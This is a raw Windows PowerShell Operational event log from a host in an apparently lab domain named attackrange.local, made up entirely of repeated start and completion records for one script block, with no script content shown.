ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474621
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474620
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474619
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474618
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474617
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474616
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474615
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474614
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474613
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474612
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474611
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474610
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474609
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474608
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474607
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474606
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474605
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474604
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474603
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474602
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474601
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474600
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474599
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474598
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474597
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474596
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474595
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474594
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474593
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474592
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474591
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474590
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474589
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474588
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474587
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474586
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474585
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474584
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474583
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474582
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474581
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474580
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474579
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474578
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474577
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474576
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474575
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474574
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474573
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474572
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474571
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474570
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474569
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474568
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474567
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
